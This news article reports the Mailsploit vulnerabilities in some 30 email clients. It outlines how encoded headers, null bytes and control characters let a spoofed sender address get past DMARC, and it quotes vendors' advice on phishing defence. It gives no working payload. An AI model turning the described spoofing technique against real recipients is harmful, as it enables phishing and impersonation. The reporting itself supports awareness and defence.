Hackers can craft undetectable spoof emails exploiting a set of vulnerabilities found in 30 types of email clients.
Hackers can craft undetectable spoof emails exploiting a set of vulnerabilities found in 30 types of email clients.

A collection of vulnerabilities dubbed Mailsploit, found by German security researcher Sabri Haddouche in 30 types of email client applications – from Apple Mail to Mozilla Thunderbird – lets hackers bypass anti-spoofing mechanisms, including DMARC.

Mailsplot lets attackers “display an arbitrary sender email address to the email recipient,” wrote Haddouche, who used potus@whitehouse.gov in a demo posted to reddit. Since all email headers must contain only ASCII characters, “the trick resides in using RFC-1342 (from 1992!), a recommendation that provides a way to encode non-ASCII chars inside email headers in such a way that it won't confuse the MTAs [Mail Transfer Agents] processing the email,” he said. “Unfortunately, most email clients and web interfaces don't properly sanitize the string after decoding, which leads to this email spoofing attack.”

Because iOS is vulnerable to null-byte injection and macOS is vulnerable to “email(name)” injection, Haddouche said, referring to a demo, the domain part of an original email can be hidden or removed, then replaced, by employing “a combinations of control characters such as new lines or null-byte.”

The exploits take advantage of the how the email sender name is displayed to bypass DMARC. “The server still validates properly the DKIM signature of the original domain and not the spoofed one,” the researcher wrote. “While MTAs not only don't detect and block these spoofed email addresses, they will happily relay those emails as long as the original email seems trustworthy enough (the attacker can therefore ironically profit from setting up DMARC on that email address).”

As a result, Haddouche said, the spoofed emails are “virtually unstoppable.”

“Phishing attacks are one of the most effective ways for bad actors to infiltrate and infect organizations,” said Bob Noel, director of strategic relationships and marketing at Plixer. MailSploit is the latest example of how users can be tricked into opening emails with malicious payloads and links. End users must be trained to no longer implicitly trust emails they receive from either known or unknown senders. Given the continued high rate of phishing success, IT departments should implement Network Traffic Analytics platforms to monitor all network traffic and have access to forensic data when users fall victim to phishing attacks. This visibility enables organizations to understand what happened, return to normal, and protect themselves against the spread of malware like ransomware.”  

“This is a perfect example of how phishing campaigns are becoming increasingly sophisticated and targeted,” said Eyal Benishti, CEO and founder of IRONSCALES. “As is the case here, fraudsters are frequently adopting spoofing and impersonation techniques in a quick, easy, and incredibly successful way to lure their potential victims into a false sense of security. As a result, it is becoming virtually impossible for end users to identify these phishing emails as they land in inboxes across the workforce.”

Benishiti recommended that users detect and deflect phishing messages by:

1. “Checking for ‘spoofing' through sender policy framework (SPF) records, display name, email address and domain similarity.

2.  Augmenting the representation of senders inside the email client by learning true sender indicators and score sender reputation through visual cues and metadata associated with every email.

3.  Integrating automatic smart real-time email scanning into multi anti-virus, and sandbox solutions so forensics can be performed on any suspicious emails either detected, or reported.

4.  Allowing quick reporting via an augmented email experience, thus helping the user make better decisions."